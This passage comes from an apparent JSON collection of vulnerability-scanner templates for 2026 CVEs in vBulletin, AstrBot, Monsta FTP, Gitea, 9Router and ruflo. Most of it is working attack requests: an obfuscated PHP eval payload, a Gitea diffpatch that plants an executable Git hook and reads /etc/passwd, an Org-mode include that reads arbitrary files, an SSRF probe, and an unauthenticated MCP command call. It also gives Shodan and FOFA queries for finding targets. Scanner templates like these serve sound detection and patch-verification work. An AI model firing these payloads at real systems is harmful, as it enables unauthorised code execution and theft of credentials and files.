severity: critical\n  description: |\n    vBulletin 5.x through 5.7.5 and 6.x through 6.2.1 contain an eval injection vulnerability caused by insufficiently restrictive regex filtering in vB5_Template_Runtime::runMaths(), letting unauthenticated remote attackers execute arbitrary PHP code via the pagenav[pagenumber] parameter in ajax/render template route.\n  impact: |\n    Unauthenticated remote attackers can execute arbitrary PHP code, potentially leading to full system compromise.\n  remediation: |\n    Update to a version later than 5.7.5 for 5.x and later than 6.2.1 for 6.x or the latest available version.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-61511\n    - https://github.com/shootcannon/CVE-2026-61511\n  classification:\n    cve-id: CVE-2026-61511\n    epss-score: 0.70766\n    epss-percentile: 0.99369\n    cwe-id: CWE-94\n  metadata:\n    max-request: 1\n    verified: true\n    vendor: vbulletin\n    product: vbulletin\n    shodan-query: http.favicon.hash:-601665621 http.component:\"vBulletin\"\n    fofa-query: body=\"Powered by vBulletin\"\n  tags: cve,cve2026,vbulletin,rce,unauth,vkev\n\nhttp:\n  - raw:\n      - |\n        POST / HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        routestring=ajax/render/pagenav&pagenav[pagenumber]=(((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(1).(5)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(2).(1)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(1).(5)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(1).(6)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(0).(1)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(0).(9)))((((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(0).(1)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((9).(9)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(0).(4)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(1).(1)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((3).(2)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(1).(8)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((9).(8)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((5).(4)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(1).(4)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((9).(9)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(0).(1)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(1).(2)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(1).(4)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(1).(1)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((9).(8)).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))((1).(0).(1))))\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"vb6rceprobe\")'\n        condition: and\n# digest: 4a0a0047304502210084a07cba0804de9afac83e0dc557d4a02227d2214dc4144ba61b85649568e1ba0220397bf4d6af15ad9dc32d7f2737a6abe5bb6441113970e01a59cf3e8e99bf6e2b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-61511.yaml","vuln_id":"cve-2026-61511"},{"raw":"id: CVE-2026-6118\n\ninfo:\n  name: AstrBot <= 4.22.1 - Command Injection\n  author: jyoti369\n  severity: high\n  description: |\n    AstrBot versions up to and including 4.22.1 contain a command injection vulnerability in the MCP server configuration endpoint. The /api/tools/mcp/add endpoint accepts arbitrary command and args fields that are passed directly to subprocess execution during the connection test, without any validation or allowlist enforcement. An attacker with dashboard access can execute arbitrary system commands with AstrBot process privileges.\n  impact: |\n    Authenticated attackers can execute arbitrary system commands, leading to full server compromise, data exfiltration, and lateral movement.\n  remediation: |\n    Upgrade AstrBot to version 4.22.2 or later which introduces command allowlisting and validation. Change default dashboard credentials immediately.\n  reference:\n    - https://github.com/AstrBotDevs/AstrBot/issues/7169\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-6118\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-6118\n    epss-score: 0.02533\n    epss-percentile: 0.84235\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: AstrBotDevs\n    product: AstrBot\n    shodan-query: title:\"AstrBot\"\n  tags: cve,cve2026,astrbot,rce,oast,authenticated\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /api/auth/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"username\":\"{{username}}\",\"password\":\"{{md5(password)}}\"}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"token\"'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: token\n        part: body\n        group: 1\n        regex:\n          - '\"token\"\\s*:\\s*\"([^\"]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/tools/mcp/add HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"name\":\"{{randstr}}\",\"command\":\"nslookup\",\"args\":[\"{{interactsh-url}}\"],\"active\":false}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"status\", \"MCP connection test failed\")'\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a0047304502200dbf173b650f1158cc4e2fac20060e77d34dc5c168d472626f0d451e0a696872022100d3af8b19fa6265783ef4f9558c2baacb4c6938e6dde1f2bc9159c0fa136de464:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-6118.yaml","vuln_id":"cve-2026-6118"},{"raw":"id: CVE-2026-60105\n\ninfo:\n  name: Monsta FTP <= 2.14.4 - Unauthenticated SSRF via IPv6 Blocklist Bypass\n  author: chocapikk,DhiyaneshDk\n  severity: high\n  description: |\n    Monsta FTP before 2.14.5 contains a server-side request forgery vulnerability in the fetchRemoteFile action caused by an incomplete IP blocklist check in the isBlockedIP() function, which fails to detect embedded IPv4 addresses within IPv4-mapped IPv6 addresses.\n  impact: |\n    An unauthenticated attacker can obtain a CSRF token from the public getSystemVars endpoint and submit a fetchRemoteFile request with a source URL resolving to an IPv4-mapped address, causing the server to issue HTTP requests to internal services and write responses to an attacker-controlled FTP destination, enabling retrieval of cloud instance metadata credentials.\n  remediation: Upgrade to Monsta FTP 2.14.5 or later.\n  reference:\n    - https://www.vulncheck.com/blog/monsta-ftp-ssrf-ipv6-blocklist-bypass\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2026-60105\n    epss-score: 0.0186\n    epss-percentile: 0.78303\n    cwe-id: CWE-918,CWE-184\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: monsta\n    product: monsta-ftp\n    shodan-query: http.html:\"Monsta FTP\"\n    fofa-query: body=\"Monsta FTP\"\n  tags: cve,cve2026,monsta,ftp,ssrf,oob,unauth,vkev\n\nflow: http(\"get-csrf\") && http(\"ssrf-probe\")\n\nhttp:\n  - id: get-csrf\n    raw:\n      - |\n        POST /mftp/application/api/api.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        request={\"actionName\":\"getSystemVars\",\"context\":{}}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: word\n        words:\n          - \"csrfToken\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: csrf_token\n        regex:\n          - '\"csrfToken\"\\s*:\\s*\"([a-f0-9]+)\"'\n        group: 1\n        internal: true\n\n  - id: ssrf-probe\n    raw:\n      - |\n        POST /mftp/application/api/api.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        X-CSRF-Token: {{csrf_token}}\n\n        request={\"actionName\":\"fetchRemoteFile\",\"connectionType\":\"ftp\",\"configuration\":{\"host\":\"{{interactsh-url}}\",\"port\":21,\"username\":\"anonymous\",\"password\":\"anonymous@\",\"passive\":true},\"context\":{\"source\":\"http://{{interactsh-url}}/ssrf-probe\",\"destination\":\"/\"}}\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n          - \"http\"\n        condition: or\n# digest: 4b0a00483046022100c7942f3b8007cd657830298b31c05a081699c52d49a2d2a2477cc08cd3af3b06022100b148ff1c05a145d8616b73fac5a8627262510d6c562b34d26f3a3b4b5203d457:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-60105.yaml","vuln_id":"cve-2026-60105"},{"raw":"id: CVE-2026-60004\n\ninfo:\n  name: Gitea <= 1.27.0 - Pre-Auth Remote Code Execution\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    Gitea versions 1.17 through 1.27.0 contain a remote code execution vulnerability in the diffpatch endpoint caused by an add/add collision that writes an executable Git hook into the bare repository's GIT_DIR. An attacker with write access can execute arbitrary commands as the Gitea service account, exploit requires only open registration for unauthenticated access.\n  impact: |\n    Attackers can execute arbitrary commands as the Gitea service account, potentially compromising the entire server and all hosted repositories.\n  remediation: |\n    Update to Gitea version 1.27.1 or later.\n  reference:\n    - https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m\n    - https://github.com/EQSTLab/CVE-2026-60004\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-60004\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-60004\n    epss-score: 0.86777\n    epss-percentile: 0.99735\n    cwe-id: CWE-94\n  metadata:\n    max-request: 9\n    verified: true\n    vendor: go-gitea\n    product: gitea\n    shodan-query: \"Gitea\"\n    fofa-query: app=\"Gitea\"\n  tags: cve,cve2026,gitea,rce,intrusive,kev,vkev\n\nvariables:\n  ruser: \"testpoc{{rand_int(10000,99999)}}\"\n  rpass: \"T3stP0c!{{rand_int(10000,99999)}}\"\n  remail: \"testpoc{{rand_int(10000,99999)}}@test.local\"\n  rrepo: \"poc-{{rand_int(10000,99999)}}\"\n\nflow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) && http(7)\n\nhttp:\n  - raw:\n      - |\n        GET /user/sign_up HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"user_name\") || contains(body, \"sign_up\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: csrf\n        part: body\n        group: 1\n        regex:\n          - 'name=\"_csrf\"\\s+content=\"([^\"]+)\"'\n          - 'name=\"_csrf\"\\s+value=\"([^\"]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /user/sign_up HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        _csrf={{csrf}}&user_name={{ruser}}&email={{remail}}&password={{rpass}}&retype={{rpass}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 302 || status_code == 303'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/user/repos HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json\n        Authorization: Basic {{base64(ruser + \":\" + rpass)}}\n\n        {\"name\":\"{{rrepo}}\",\"private\":true,\"auto_init\":true,\"default_branch\":\"main\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 201'\n        internal: true\n\n  - raw:\n      - |\n        GET /api/v1/repos/{{ruser}}/{{rrepo}}/branches/main HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n        Authorization: Basic {{base64(ruser + \":\" + rpass)}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'len(branch_sha) > 0'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: branch_sha\n        json:\n          - '.commit.id'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/repos/{{ruser}}/{{rrepo}}/diffpatch HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json\n        Authorization: Basic {{base64(ruser + \":\" + rpass)}}\n\n        {\"content\": \"diff --git a/hooks/post-index-change b/hooks/post-index-change\\nnew file mode 100755\\nindex 0000000000000000000000000000000000000000..c205f89dc5a73d8094236a8ef700126084893a73\\n--- /dev/null\\n+++ b/hooks/post-index-change\\n@@ -0,0 +1,14 @@\\n+#!/bin/sh\\n+git_dir=$(git rev-parse --absolute-git-dir) || exit 1\\n+origin_objects=$(sed -n \\\"1p\\\" \\\"$git_dir/objects/info/alternates\\\") || exit 2\\n+case \\\"$origin_objects\\\" in\\n+  /*) ;;\\n+  *) origin_objects=\\\"$git_dir/objects/$origin_objects\\\" ;;\\n+esac\\n+origin_git=${origin_objects%/objects}\\n+[ \\\"$origin_git\\\" != \\\"$origin_objects\\\" ] || exit 3\\n+output_blob=$(cat /etc/passwd 2>&1 | git --git-dir=\\\"$origin_git\\\" hash-object -w --stdin) || exit 4\\n+tree=$(printf \\\"100644 blob %s\\\\\\\\tproof\\\\\\\\n\\\" \\\"$output_blob\\\" | git --git-dir=\\\"$origin_git\\\" mktree) || exit 5\\n+commit=$(printf \\\"rce proof\\\\\\\\n\\\" | GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@x GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@x git --git-dir=\\\"$origin_git\\\" commit-tree \\\"$tree\\\") || exit 6\\n+git --git-dir=\\\"$origin_git\\\" update-ref refs/heads/rce-proof \\\"$commit\\\" || exit 7\\n+exit 0\\n\", \"message\": \"apply-1\", \"branch\": \"main\", \"sha\": \"{{branch_sha}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 201'\n          - 'len(commit_sha1) > 0'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: commit_sha1\n        json:\n          - '.commit.sha'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/repos/{{ruser}}/{{rrepo}}/diffpatch HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json\n        Authorization: Basic {{base64(ruser + \":\" + rpass)}}\n\n        {\"content\": \"diff --git a/hooks/post-index-change b/hooks/post-index-change\\nnew file mode 100755\\nindex 0000000000000000000000000000000000000000..c205f89dc5a73d8094236a8ef700126084893a73\\n--- /dev/null\\n+++ b/hooks/post-index-change\\n@@ -0,0 +1,14 @@\\n+#!/bin/sh\\n+git_dir=$(git rev-parse --absolute-git-dir) || exit 1\\n+origin_objects=$(sed -n \\\"1p\\\" \\\"$git_dir/objects/info/alternates\\\") || exit 2\\n+case \\\"$origin_objects\\\" in\\n+  /*) ;;\\n+  *) origin_objects=\\\"$git_dir/objects/$origin_objects\\\" ;;\\n+esac\\n+origin_git=${origin_objects%/objects}\\n+[ \\\"$origin_git\\\" != \\\"$origin_objects\\\" ] || exit 3\\n+output_blob=$(cat /etc/passwd 2>&1 | git --git-dir=\\\"$origin_git\\\" hash-object -w --stdin) || exit 4\\n+tree=$(printf \\\"100644 blob %s\\\\\\\\tproof\\\\\\\\n\\\" \\\"$output_blob\\\" | git --git-dir=\\\"$origin_git\\\" mktree) || exit 5\\n+commit=$(printf \\\"rce proof\\\\\\\\n\\\" | GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@x GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@x git --git-dir=\\\"$origin_git\\\" commit-tree \\\"$tree\\\") || exit 6\\n+git --git-dir=\\\"$origin_git\\\" update-ref refs/heads/rce-proof \\\"$commit\\\" || exit 7\\n+exit 0\\n\", \"message\": \"apply-2\", \"branch\": \"main\", \"sha\": \"{{commit_sha1}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 201'\n        internal: true\n\n  - raw:\n      - |\n        GET /api/v1/repos/{{ruser}}/{{rrepo}}/raw/proof?ref=rce-proof HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic {{base64(ruser + \":\" + rpass)}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"root:\")'\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"CVE-2026-60004 RCE | Gitea | /etc/passwd: \" + body'\n# digest: 4a0a00473045022100de932e970b8d593041f7836d99f524df08f2575a05691e142495f9c5760c241002200af8edd029115f04ff2fa4af47a3534cd7443f62f2115ac006b0676d955358eb:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-60004.yaml","vuln_id":"cve-2026-60004"},{"raw":"id: CVE-2026-59801\n\ninfo:\n  name: 9Router - Unauthenticated LLM Provider API Exposure\n  author: 0x_Akoko\n  severity: critical\n  description: |\n   9Router through version 0.4.41 contains an unauthenticated access vulnerability caused by missing authentication middleware in Next.js API routes under src/app/api/providers/*, letting remote attackers enumerate, create, modify, or delete provider connections, exploit requires no authentication.\n  impact: |\n   Remote attackers can expose credentials, redirect traffic, or cause denial of service by deleting provider connections.\n  remediation: |\n   Update to the latest version that includes authentication middleware for API routes.\n  reference:\n    - https://github.com/decolua/9router/security/advisories/GHSA-vjc7-jrh9-9j86\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-59801\n  metadata:\n    verified: true\n    max-request: 2\n    product: 9router\n    vendor: decolua\n    shodan-query: port:20128 http.html:\"9Router\"\n    fofa-query: port=\"20128\" || title=\"9Router\"\n  tags: 9router,unauth,api-exposure,misconfig,api-key-leak\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /api/version HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"currentVersion\")'\n          - 'compare_versions(lsversion, \">=0.0.1\", \"<=0.4.41\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: lsversion\n        internal: true\n        group: 1\n        regex:\n          - '\"currentVersion\"\\s*:\\s*\"([^\"]+)\"'\n\n  - raw:\n      - |\n        GET /api/providers HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"authType\", \"provider\", \"connections\")'\n        condition: and\n# digest: 490a00463044022006f0fed50c29d6ba9ddcb673702b7616c0b1b74dab30eb96b5c2e05f5178092d022020940a819186881ff030d085e9a6e18629af664546a645c2fd7f2d83d141592b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-59801.yaml","vuln_id":"cve-2026-59801"},{"raw":"id: CVE-2026-59774\n\ninfo:\n  name: Gitea 1.22.1-1.27.0 - Unauthenticated Arbitrary File Read\n  author: ashish-cybersec\n  severity: critical\n  description: |\n    Gitea versions 1.22.1 through 1.27.0 initialize the go-org markup renderer without replacing its default ReadFile callback. An unauthenticated attacker can submit Org-mode markup containing an #+INCLUDE directive with an absolute path to the repository markup endpoint of any public repository, causing the server to read and render arbitrary files accessible to the Gitea service user.\n  impact: |\n    Unauthenticated attackers can read arbitrary files readable by the Gitea service user, including app.ini which contains INTERNAL_TOKEN, OAuth and JWT material, and database credentials. The advisory notes this can be escalated to command execution via Git hook injection.\n  remediation: |\n    Update to Gitea version 1.27.1 or later.\n  reference:\n    - https://github.com/go-gitea/gitea/security/advisories/GHSA-6v53-hr58-556r\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-59774\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-59774\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: go-gitea\n    product: gitea\n    shodan-query: http.title:\"Gitea\"\n    fofa-query: title=\"Gitea\"\n  tags: cve,cve2026,gitea,lfi,traversal,markup\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/repos/search?limit=1\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"full_name\\\":\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: reponame\n        json:\n          - '.data[0].full_name'\n        internal: true\n\n  - raw:\n      - |\n        POST /{{reponame}}/markup HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        mode=file&file_path=a.org&text=%23%2BINCLUDE%3A%20%22%2Fetc%2Fpasswd%22%20src%20shell\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"chroma language-bash\"\n\n      - type: regex\n        part: body\n        regex:\n          - 'root:.*:0:0:'\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402207952c0ad7804ce2b1f097b7793cceb70ee22f58c77c90e14ef7258f9246644b10220436b2bb491ced8525e677d0cc58f2cab8e2c6321c2c308461531f55b7e53c442:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-59774.yaml","vuln_id":"cve-2026-59774"},{"raw":"id: CVE-2026-59726\n\ninfo:\n  name: ruflo MCP Bridge - Unauthenticated RCE via terminal_execute\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    ruflo MCP bridge (< 3.16.3) in its default docker-compose deployment exposes POST /mcp with no authentication and binds to all interfaces (0.0.0.0:3001). The executeTool() function has no server-side deny list for dangerous tools, allowing an unauthenticated attacker to invoke tools/call with ruflo__terminal_execute, which runs execSync(command) on attacker-supplied input. This yields arbitrary command execution as the node user (uid 1000) inside the bridge container. The blocklist (AUTOPILOT_BLOCKED_PATTERNS + isBlockedTool()) is enforced only in the autopilot SSE handler; POST /mcp and POST /mcp/:group bypass it entirely.\n  impact: |\n    Unauthenticated remote code execution. An attacker can read provider API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY, etc.) from the container environment, spawn attacker-controlled swarms on victim keys, and persist poisoned patterns into AgentDB.\n  remediation: |\n    Upgrade ruflo to version 3.16.3 or later which adds DANGEROUS_TOOLS gate in executeTool(), bearer auth middleware (MCP_AUTH_TOKEN), loopback bind by default (BIND_HOST=127.0.0.1), and MCP_ENABLE_TERMINAL opt-in. As interim mitigation, firewall port 3001 and set MCP_AUTH_TOKEN in docker-compose.yml.\n  reference:\n    - https://github.com/ruvnet/ruflo/security/advisories/GHSA-c4hm-4h84-2cf3\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-59726\n    - https://www.pruva.dev/reproductions/REPRO-2026-00315\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-59726\n    epss-score: 0.16428\n    epss-percentile: 0.96836\n    cwe-id: CWE-78\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: ruvnet\n    product: ruflo\n  tags: cve,cve2026,ruflo,mcp,rce,unauth,ghsa\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /mcp HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"jsonrpc\":\"2.0\",\"method\":\"tools/list\",\"id\":1}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"terminal_execute\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /mcp HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"jsonrpc\":\"2.0\",\"method\":\"tools/call\",\"id\":1,\"params\":{\"name\":\"ruflo__terminal_execute\",\"arguments\":{\"command\":\"id\"}}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"uid=\", \"gid=\", \"exitCode\")'\n          - 'status_code == 200'\n        condition: and\n\n    extractors:\n      - type: regex\n        group: 0\n        regex:\n          - 'uid=[0-9]+\\([a-z]+\\)'\n# digest: 490a0046304402200884513f42395e1b58bbd5ff288ba6b4987f99a66ea17446b1fcef1febd95a4e02201c9c6f38cedc70d4187b6f565a117889902d6a7760891bef343ad34e19f91117:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-59726.yaml","vuln_id":"cve-2026-59726"},{"raw":"id: CVE-2026-59509\n\ninfo:\n  name: 